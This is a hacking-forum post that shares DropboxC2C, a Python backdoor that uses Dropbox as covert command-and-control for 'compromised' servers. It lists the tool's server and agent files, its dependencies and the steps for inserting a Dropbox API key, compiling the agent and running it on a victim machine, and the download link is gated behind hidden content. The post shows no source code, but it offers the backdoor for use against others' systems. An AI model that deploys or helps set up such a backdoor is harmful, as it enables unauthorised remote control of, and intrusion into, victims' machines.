Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked DropboxC2C - Python backdoor Using Dropbox As A Command And Control


Diabl0

Recommended Posts

This is the hidden content, please

 

This is the hidden content, please

 

This is the hidden content, please

 

About

In simple terms, DropboxC2C is a post-exploitation agent which uses Dropbox Infrastructure for command and control operations.

 

Structure

  • main.py - The "server" part which manages all the agents.
  • agent.py - The "client" part which does what the server tells.

 

Requirements

  1. Python 2.7
  2. Libraries :

 

  • dropbox
  • psutil
  • pyinstaller

 

 

Installation

1-) Modify the API Key on agent.py and main.py # The api key must be created from the dropbox web interface.

 

2-) Run setup.bat on a Windows Machine. You will get agent.exe which is the "compiled" agent.

 

3-) Run main.py and run the agent on the compromised server.

 

Usage:

pip install -r requirements.txt

edit main.py insert your api key

 

python main.py

python agent.py

 

Download lInk:

[HIDE-THANKS]

LiNK:

This is the hidden content, please

[/HIDE-THANKS]

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.